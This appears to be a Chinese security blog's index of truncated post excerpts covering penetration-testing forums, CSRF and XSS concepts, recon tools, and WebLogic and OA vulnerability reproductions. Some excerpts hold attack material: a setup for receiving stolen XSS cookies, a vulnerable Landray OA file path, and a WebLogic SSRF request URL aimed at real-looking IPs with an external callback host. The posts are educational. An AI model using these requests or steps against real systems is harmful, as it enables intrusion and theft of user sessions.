比较知名的渗透测试的民间讨论社区及其网址
FreeBuf(https://www.freebuf.com/):FreeBuf是一个国内知名的网络安全门户网站,也是一个非常活跃的渗透测试社区。在这个社区中,您可以了解最新的网络安全资讯、渗透测试技术和工具,还可以与其他网络安全爱好者和专业人士交流经验和技术。
零组安全论坛(https://www.0dayhack.com/):零组安全论坛是一个国内知名的网络安全社区,也是一个非常活跃的渗透测试社区。在这个社区中,您可以找到各种渗透测试技术和工具的讨论和分享,还可以与其他网络安全爱好者交流经验和技术。
安全客(https://www.anquanke.com/):安全客是一个国内知名的网络安全门户网站,也是一个非常活跃的渗透测试社区。在这个社区中,您可以找到最新的网络安全资讯和渗透测试技术,还可以与其他网络安全爱好者和专业人士交流经验和技术。
神话安全论坛(https://bbs.ichunqiu.com/):神话安全论坛是一个国内知名的网络安全社区,也是一个非常活跃的渗透测试社区。在这个社区中,您可以找到各种渗透测试技术和工具的讨论和分享 ...
跨站请求伪造漏洞定义跨站请求伪造Cross-site request forgery(也称为CSRF、XSRF)是一种Web安全漏洞,允许攻击者诱导用户执行他们不打算执行的操作。攻击者通过伪造用户的浏览器的请求,向用户自己曾经认证访问过的网站发送出去,使目标网站接收并误以为是用户的真实操作而去执行操作。
跨站:从一个网站到另一个网站请求:HTTP请求伪造:仿造、伪装
一个网站A中发起一个到网站B的请求,而这个请求是经过了伪装的,伪装操作达到的目的就是让请求看起来像是从网站B中发起的,也就是说,让B网站所在的服务器端误以为该请求是从自己网站发起的,而不是从A网站发起的。当然,请求一般都是恶意的。看到这里,你可能会问:为什么要伪装成从B网站发起的呢?从网站A直接向B网站服务器发起请求不可以吗?之所以要伪装成从B网站发起的,是因为Cookie是不能跨域发送的。结合上面这个例子来说就是:如果从A网站直接发送请求到B网站服务器的话,是无法将B网站中产生的Cookie一起发给B服务器的。可能你还会问,为什么非要发送Cookie呢?这是因为服务器在用户登录后会将用户的一些信息放到Cookie中 ...
一、常用的外围打点工具有哪些?
名称
描述
水泽
信息手机自动化工具
Masscan
端口扫描工具
subDomainsBrute
子域名收集工具
水泽
信息手机自动化工具
FOFA
网络空间资产检索
Goby
攻击面测绘工具
二、描述一下外围打点的基本流程?
五个步骤,分别是靶标确认、信息收集、漏洞探测、利用漏洞和获取权限,最终要得到的是获取靶标的系统权限进而获得关键数据。
三、怎么识别CDN?
使用ping命令看回显
使用nslookup查询域名解析,看域名解析情况
使用超级ping工具,像Tools,all-toll.cn等。
四、怎么判断靶标站点是windows系统还是Linux系统?
通过ping靶机,看返回的TTL值,Windows大于100、Linux小于100的
看大小写,Linux区别大小写,Windows则不分
五、举常见的FOFA在外网打点过程中的查询语句?
漏洞方面:body=“Index of/”(列目录漏洞)
框架:body=“icon-spring-boot-admin.svg”( ...
盗取Cookie前提条件
-目标网站没有使用http-only-受害者可以访问到接收端-获取到cookie后目标用户没有退出登录
CookieCookie是一种存储在计算机浏览器目录中的文本文件。当用户浏览某个站点并注册帐号,就会生成一个Cookie文件用于记录登录信息。目前,大多数网站都会应用Cookie技术,这既能给用户提供一个好的网络环境,又能方便收集访客信息。
攻击方法方法一攻击者视角首先在公网服务器启动一个用于接收Cookie的WEB服务,既可以使用python启动,也可以使用Apache启动。
因为受害者与攻击者处于各自的局域网之中,两者之间是无法通信的。如果你想要获取到受害者的Cookie,则必须要使得受害者能与攻击者进行通信,所以攻击者需要在公网里启动
python3启动WEB服务:
1python3 -m http.server --bind 0.0.0.0 2333
然后在XSS漏洞的地方插入攻击代码
JavaScript 可以使用 document.cookie 属性来创建 、读取、及删除 cookie。 window.open 常用来在新的wind ...
XSS概念跨站脚本(Cross-site scripting,简称XSS),是指恶意攻击者往Web页面里插入恶意代码,当用户浏览该页之时,嵌入其中Web页面的HTML代码会被执行,从而达到恶意攻击用户的目的。
为什么称为xss,依照英文缩写习惯,简称跨站脚本为CSS。这样会引起它和另一个名词“层叠样式表”(Cascading Style Sheets,CSS)的混淆。此CSS非彼CSS。为了以示区别,一些安全人士就习惯将跨站脚本简称为XSS。
XSS漏洞危害1)钓鱼欺骗:最典型的就是利用目标网站的反射型跨站脚本漏洞将目标网站重定向到钓鱼网站,或者注入钓鱼 JavaScript 以监控目标网站的表单输入,甚至发起基于 DHTML 更高级的钓鱼攻击方式。2)网站挂马:跨站时利用 IFrame 嵌入隐藏的恶意网站或者将被攻击者定向到恶意网站上,或者弹出恶意网站窗口等方式都可以进行挂马攻击。3)身份盗用:Cookie 是用户对于特定网站的身份验证标志,XSS 可以盗取到用户的 Cookie,从而利用该 Cookie 盗取用户对该网站的操作权限。如果一个网站管理员用户 Cookie 被窃取, ...
常见专业术语
0day,也叫零日漏洞(zero-day),通常是指还没有补丁的安全漏洞,零日漏洞得名于开发人员发现漏洞时补丁存在的天数。
nday,当软件的补丁发布出来以后,有的管理员并不重视,没有给软件打上新发布的漏洞补丁,这样所产生的漏洞就是俗称的n-day漏洞。
poc,是 Proof of Concept 的缩写,中文意思是概念验证,也就是具体项目开展前,对客户的需求进行简单的基础验证,POC 通过后,再向后推进。
exp,一般指可利用系统漏洞进行攻击的动作程序。
payload,中文‘有效载荷’,指成功exploit之后,攻击代码释放的具有攻击能力的能够实现攻击者目的的代码。
OA漏洞OA办公自动化(Office Automation,简称OA)是将现代化办公和计算机技术结合起来的一种新型的办公方式。
常见OA系统
致远OA蓝凌OA用友OA通达OA泛微OA金蝶OA万户OA华天动力OA红帆医疗云OA
A. 蓝凌OA任意文件读取漏洞
蓝凌OA(EKP)存在任意文件读取漏洞可能导致敏感信息泄露。
1)漏洞路径
1/sys/ui/extend/varkind/custom.js ...
背景近年来网络安全问题在日常生活工作中显得愈发重要,随着科技的发展和越来越多新技术的出现,更多的安全漏洞也会随之出现,当新安全漏洞出现时,一些网站或服务器往往会被黑客攻击或利用,当网站维护者紧急修复网站后,有些漏洞会产生连带漏洞,如果不能及时搞明白漏洞原理则会产生更大的损失。
定义漏洞复现是通过已公布漏洞的POC(检测)模拟恶意黑客的攻击方法,来实现对于漏洞的利用与掌握。定期漏洞复现可知道漏洞的利用方法及防范的措施,能有效提高安全水平,及时更新并检测网站,避免黑客入侵,保护网站安全。
目的漏洞复现一般有两种方式:
一种是简单的搭建环境,然后拿公开exp(检测与利用代码的结合)打一次:这样能在以后你看到类似有漏洞的程序的时候能直觉 看出来,而且在实战的时候避开一些坑,提高熟练度手速。
另一种是对程序进行代码动态调试,代码审计,配合exp poc分析漏洞成因。
当渗透测试人员在对网站进行渗透测试时,如果前期进行过某些漏洞的复现,而恰好目标网站存在这些漏洞,则会事半功倍,用更短的时间取得网站的数据信息或权限,而不是再查阅资料,准备漏洞环境,进行漏洞复现,这样会让渗透测试的效率变得低下或 ...
CVE-2018-2628
WebLogic RMI 反序列化
Java 序列化是指把 Java 对象转换为字节序列的过程,便于保存在内存、文件、数据 库中。反序列化是指把字节序列恢复为 Java 对象的过程。
ObjectOutputStream 类的 writeObject() 方法可以实现序列化。ObjectInputStream 类的 readObject() 方法用于反序列化。
基础知识
weblogic: WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器
JRMP:java remote method protocol,Java远程方法协议。 JRMP是的Java技术协议的具体对象为希望和远程引用。JRMP只能是一个Java特有的,基于流的协议。相对于的RMI -IIOP的 ,该协议JRMP只能是一个对象的Java到Java的远程调用,这使得它依赖语言,意思是客户端和服务器必须使用 ...
CVE-2018-2894
WebLogic未授权任意文件上传
在 Weblogic Web Service Test Page 中存在一处任意文件上传漏洞,Web Service Test Page 在”生产模式”下默认不开启,所以该漏洞有一定限制。利用该漏洞,可以上传任意 jsp文件,进而获取服务器权限。
影响范围12345Oracle WebLogic Server版本10.3.6.012.1.3.012.2.1.212.2.1.3
影响页面12345678该漏洞的影响模块为web服务测试页,在默认情况下不启用。/ws_utc/config.do/ws_utc/begin.do通过测试在10.3.6版本上未发现该功能登录控制台 -> base_domain -> 高级 -> 勾选启用Web服务测试页 -> 保存
漏洞复现/root/Oracle/Middleware/user_projects/domains/base_domain
https://vulhub.org/#/environ ...
CVE-2014-4210漏洞简介Weblogic 中存在一个 SSRF 漏洞,利用该漏洞可以发送任意HTTP请求,进而可以攻 击内网中 Redis 、 Fastcgi 等脆弱组件。
漏洞生于 /uddiexplorer/SearchPublicRegistries.jsp 页面中,可以导致 SSRF , 用来攻击内网中一些 redis 和 fastcgi 之类的脆弱组件
12345678http://47.104.255.11:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://47.101.214.85:9090
漏洞复现SSRF漏洞存在于以下url中,直接访问无需密码
http://your-ip:7001/uddiexplorer/Se ...